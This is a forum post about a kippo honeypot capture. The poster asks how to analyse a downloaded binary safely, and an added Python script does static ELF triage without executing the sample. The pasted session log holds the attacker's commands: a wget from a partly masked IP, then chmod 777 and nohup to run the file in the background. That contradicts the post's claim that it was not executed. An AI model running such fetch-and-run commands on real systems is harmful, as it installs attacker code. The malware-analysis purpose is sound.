Forum Thread: Examining a *.Bin File

Hi Guys,

First post. Hope you are all well.

I set up a kippo honeypot a few days ago and got my first bite earlier today. The attacker immediately issued a wget command and downloaded a file called network.bin.

I was wondering what methods you would suggest in examining this file further? Is it possible to read the code safely and establish the purpose of the file?

Interestingly the attacker did not execute the file.

Thanks in advance,
Stevie

Step 1:

debian-server:~# wget http://xxx.xxx.xxx.208:1130/Manager
--2014-12-30 16:58:08-- http://xxx.xxx.xxx.208:1130/Manager
Connecting to xxx.xxx.xxx.208:1130... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1135000 (1M) application/octet-stream
Saving to: `Manager

25% ==========> 291,224 78K/s eta 10schmod 777 Manager
57% ======================> 656,643 82K/s eta 5snohup //root/Manager > /dev/null 2>&1 &
100%======================================> 1,135,000 83K/s eta 0s

2014-12-30 16:58:22 (83 KB/s) - `Manager' saved 1135000/1135000
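
A static first pass over a downloaded sample like the one in this thread, as an added example that is not part of the original post: it reads the file as bytes without ever executing it, hashes it, compares its size with the Length that wget reported, decodes the ELF header, and lists strings that look like URLs or IP addresses. The function name `triage`, the lookup tables and the `SAMPLE` bytes are constructed for illustration.

```python
import hashlib
import re
import struct

# Subset of e_machine / e_type values from the ELF specification.
MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}
TYPES = {1: "relocatable", 2: "executable", 3: "shared/PIE", 4: "core"}
# Strings worth a second look: URLs and dotted-quad addresses.
NET = re.compile(rb"https?://|\b(?:\d{1,3}\.){3}\d{1,3}\b")


def triage(data: bytes, expected_len=None) -> dict:
    """Static triage only: the sample is treated as bytes and never run."""
    report = {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        # A size that differs from wget's Length means a truncated capture.
        "complete": expected_len is None or len(data) == expected_len,
        "format": "unknown",
    }
    if len(data) >= 20 and data[:4] == b"\x7fELF":
        bits = {1: 32, 2: 64}.get(data[4])      # EI_CLASS
        order = {1: "<", 2: ">"}.get(data[5])   # EI_DATA
        if bits and order:
            e_type, e_machine = struct.unpack_from(order + "HH", data, 16)
            report.update(
                format="ELF", bits=bits,
                endian="little" if order == "<" else "big",
                type=TYPES.get(e_type, hex(e_type)),
                machine=MACHINES.get(e_machine, hex(e_machine)),
            )
    # Printable ASCII runs of 6+ bytes, in the spirit of strings(1).
    runs = re.findall(rb"[\x20-\x7e]{6,}", data)
    report["network_strings"] = [r.decode() for r in runs if NET.search(r)]
    return report


# Constructed sample: 64-bit little-endian x86-64 ELF header, padding, and a
# made-up URL (192.0.2.10 is a documentation address), not a real binary.
SAMPLE = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack("<HH", 2, 62)
          + b"\x00" * 44 + b"http://192.0.2.10:8080/cfg\x00"
          + b"\x01\x02short\x00")

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

For the capture shown above, the file's bytes would be passed in with `expected_len=1135000`, the Length value from the wget output.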
